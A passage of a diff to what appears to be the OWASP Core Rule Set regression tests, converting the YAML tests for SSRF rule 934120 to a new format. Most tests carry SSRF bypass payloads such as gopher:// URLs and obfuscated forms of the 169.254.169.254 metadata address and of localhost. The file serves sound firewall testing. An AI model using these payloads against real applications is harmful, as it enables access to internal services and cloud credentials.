80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=xri://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 22 desc: SSRF - Weird protocol scheme 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=rsync://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 23 desc: SSRF - Enclosed alphanumerics 1 - digits stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=acap://①②⑦.⓪.⓪.①" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 24 desc: SSRF - Enclosed alphanumerics 2 - digits stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=imap://①⑥⑨.②⑤④.①⑥⑨.②⑤④" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 25 desc: SSRF - Enclosed alphanumerics 3 - text stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=irc://ⓛⓞⓒⓐⓛⓗⓞⓢⓣ" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 26 desc: SSRF - Enclosed alphanumerics 3 - text stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=pop3://ⓁⓄⒸⒶⓁⒽⓄⓈⓉ" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 27 desc: SSRF - 8-Bit Octal conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=ssh://0177.00.00.01" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=ssh://0177.00.00.01" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 28 desc: SSRF - 32-Bit Octal conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=rtmp://017700000001" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=rtmp://017700000001" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 29 desc: SSRF - 32-Bit Hex conversion stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=gopher://0x7f000001" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=gopher://0x7f000001" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 30 desc: SSRF - IPv6, first byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 31 desc: SSRF - IPv6, first byte full, last byte full, rest compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[a::b]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[a::b]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 32 desc: SSRF - IPv6, compressed in the middle stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[dead:beef:dead::beef:dead:beef:dead]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 33 desc: SSRF - IPv6, link-local unicast with zone ID, compressed stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::%zone1]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 34 desc: SSRF - IPv6, link-local unicast with zone ID, full stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[fe80::dead:beef:dead:beef:dead:beef%zone1]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 35 desc: SSRF - IPv6, IPv4 mapped stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:ffff:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 36 desc: SSRF - IPv6, IPv4 compatible stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[0:0:0:0:0:0:169.254.169.254]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 37 desc: SSRF - URL bypass, IP + domain stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40127.88.23.245%3A22%2F%23%20%40google.com%3A80%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 38 desc: SSRF - URL bypass, domain + IP stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://google.com%3A80%20%26%40google.com%3A80%23%20%40127.88.23.245%3A22%2F" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 39 desc: SSRF - Enclosed alphanumerics, dots stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://169。254。169。254/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://169。254。169。254/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 40 desc: SSRF - IPv6, the unspecified address stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://[::]/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://[::]/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 41 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\l\\o\\c\\a\\l\\h\\o\\s\\t/' + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 42 desc: SSRF - Glibc NSS features stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: '/get?ssrf=http://\\g\\o\\o\\g\\l\\e.\\c\\o\\m/' + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 43 desc: SSRF - Input variable coverage test (Dotless decimal) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: ssrf=http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Cookie: http://2852039166/ - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: POST - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: ssrf=http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Cookie: http://2852039166/ + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: POST + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="http://2852039166/?.txt" + Content-Type: text/plain - My epic SSRF attempt + My epic SSRF attempt - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: application/xml - method: POST - uri: "/post" - data: "http://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" - - test_title: 934120-44 + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: application/xml + method: POST + uri: "/post" + data: "http://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 44 desc: SSRF - local_file:// url scheme - Dotless decimal stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=local_file://2852039166/" - version: "HTTP/1.1" - output: - log_contains: id "934120" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=local_file://2852039166/" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml index 3a667cc5a..42ff4adc5 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml @@ -1,220 +1,218 @@ --- meta: author: "lifeforms, azurit" - enabled: true - name: "934130.yaml" - description: "Tests for rule 934130" +rule_id: 934130 tests: - - test_title: 934130-1 + - test_id: 1 desc: negative test case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=proto" - version: HTTP/1.0 - output: - no_log_contains: id "934130" - - test_title: 934130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" 